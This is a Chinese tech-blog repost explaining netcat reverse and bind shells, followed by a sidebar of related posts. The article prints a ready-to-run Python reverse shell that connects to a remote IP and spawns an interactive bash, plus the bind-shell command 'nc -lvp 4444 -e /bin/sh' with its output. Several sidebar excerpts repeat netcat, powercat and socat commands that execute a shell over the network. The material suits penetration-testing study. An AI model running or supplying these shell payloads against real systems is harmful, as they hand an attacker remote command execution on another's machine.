使用netcat的正向 / 反向shell

最新推荐文章于 2024-06-28 17:34:13 发布
最新推荐文章于 2024-06-28 17:34:13 发布
阅读量1.1k 收藏 1
点赞数
文章标签: shell 操作系统 嵌入式
原文链接:http://www.cnblogs.com/botoo/p/10238785.html
版权

  • reverse shell

  • bind shell

reverse shell描述图:

 

在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。

先启动攻击端的监听:

 

再在目标端启动反向shell:

 linux

然后可以在攻击端控制目标端的服务器,以root权限;

 

win7

然后可以在攻击端控制目标端的win7系统,以administrator权限;

 

python的反向shell:

 

import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.21',8080))
#重定向shell输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
#执行子程序
p=subprocess.call(['/bin/bash','-i'])

 

 

 

 

 

正向bind Shell

 

 

在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:

 

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。

 

 

 

 

 

root@kali:~# nc -lvp 4444 -e /bin/sh
listening on [any] 4444 ...
10.1.20.x: inverse host lookup failed: Unknown host
connect to [10.1.20.x] from (UNKNOWN) [10.1.20.x] 6065
root@kali:~# a

 

 

 

 

 

 

转载于:https://www.cnblogs.com/botoo/p/10238785.html

weixin_33720078
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端 反向外壳客户端是netcat反向外壳侦听器( nc -lvp <port> )的基于Python的替代方案。 默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上传,下载,执行和编辑文件。 您还可以下载独立版本( rsh-client-standalone.py ),这是一个较小的版本,没有自定义命令,当希望将shell作为另一个进程(如果netcat不可用)获取本地shell权限时,该版本最有用系统。
Netcat for windows 32/64 bit
04-04
Netcat for windows 32/64 bit
提防远程攻击:了解正向 Shell反向 Shell 确保服务器安全
最新发布
.
06-28 924
在当今网络安全形势日益复杂的环境中,了解正向 Shell反向 Shell 的工作原理和使用场景,对于保护你的服务器免受远程攻击至关重要。本文不仅深入解析这两种常见的远程控制技术,还将提供有效的防护建议,帮助你提升服务器的安全防护水平,确保你的系统免遭入侵。在计算机网络和信息安全领域,正向 Shell反向 Shell 是两种常见的远程控制技术。它们在渗透测试、漏洞利用以及系统管理等方面有着广泛应用。正向 Shell (Forward Shell) 是指攻击者直接连接到目标机器的 Shell
反向 shell 访问工具 netcat
一个软件工程师的技术笔记
03-08 662
问题 在实际开发项目中,原型产品在推向市场、实际部署使用之前,也需要在实际环境进行试验性运行,以便测试和改进。 但可能出现的一个问题是,部署测试的实际环境与办公室有一定的距离,甚至在不同的城市里。当应用服务程序异常后者挂掉的时候,就没有办法探查设备的实际情况了。 要是在办公室里,就可以基于局域网 ssh 登录访问,甚至基于调试串口登录。由于设备在远程,是无法通过 ssh 直接登录了。 基本...
内网中使用netcat进行正向反向获取shell
bring_coco的博客
12-07 3098
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
Php reverse shell with netcat
kezhen的专栏
09-29 1757
摘自:http://www.binarytides.com/php-reverse-shell-with-netcat/ Once you are able to gain access to a remote website or server such that you can upload any arbitrary file to it, the next thing you wan
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
04-16
android反向shell工具。 本zip包含socat arm版本 和 arm64版本,可以push到android设备运行。 例如: adb push socat /data/local/tmp/ adb shell cd /data/local/tmp/ /socat -d TCP4-LISTEN:10001,fork EXEC:/...
rsh:从CLI为Linux和Windows生成反向Shell
02-01
产品特点使用此工具,您可以轻松地使用以下语言快速生成Linux和Windows支持的反向Shell命令: 重击Bash反向壳网猫网猫OpenBSD 非传统PythonIPv4 IPv6 RubyPerlPHP 电源外壳节点JS TCSH Awk Java用法usage: rsh [-h] ...
netcat.zip 源代码
06-11
netcat.zip 源代码
shell正向反向
qq_46258964的博客
02-05 8581
正向shell反向shell 正向shell:控制端主动发起连接连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
反向Shell
钱国正的专栏
12-24 2728
http://os.51cto.com/art/201312/424378.htm 反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,“一个普通的shell或简单的SSH通道不是也能实现这些吗?”不,无法实现。在网上,我看到很多人对普通shell反向shell之间的区别分不清。在我
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
天元喜羊羊的博客
07-08 1118
fasttrack操作: root@bt:~# cd /pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks...
反向连接获得SHELL
kakaxia6337的专栏
08-22 715
#include #include #pragma comment(lib,"ws2_32.lib") SOCKET locals; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in s_sin; void help(char *cmd) { printf("CmdShell v1.0 ---- Made by Zwell/n"); printf("/tUsage:%s [host] port
How to: Shellcode to reverse bind a shell with netcat(如何使用netcat进行shellcode反向链接)
Shellcode.Cool!
05-23 1498
Imagine you found a vulnerability in a web server and decided to take over that machine to do your dirty deeds, what do you do? Well, for starters, you have to figure out how to exploit the vulnerabil
netcatshell反弹测试
HideInTime的博客
04-21 422
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,
netcat获得反向shell
天元喜羊羊的博客
07-06 3969
netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar 在BT5上: root@bt:~# nc -l -p 8090 -e /bin/sh 在XP上: E:\>nc 192.168.1.11 8090 ls Desktop ifconfig eth0 Link encap:Ethernet HWaddr
黑客零基础第一章--反向shell
ShadowBlade
08-09 4930
一篇文章叫你完全掌握反向shell
Kali与Windows10渗透测试:正向反向连接实战
2. **执行:** 使用`powercat-c`命令行选项,指定目标IP(192.168.96.129),端口号(1234),以及要使用的命令(如ecmd.exe),以建立一个正向shell连接: ``` powercat-c 192.168.96.129 -p 1234 -ecmd.exe ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值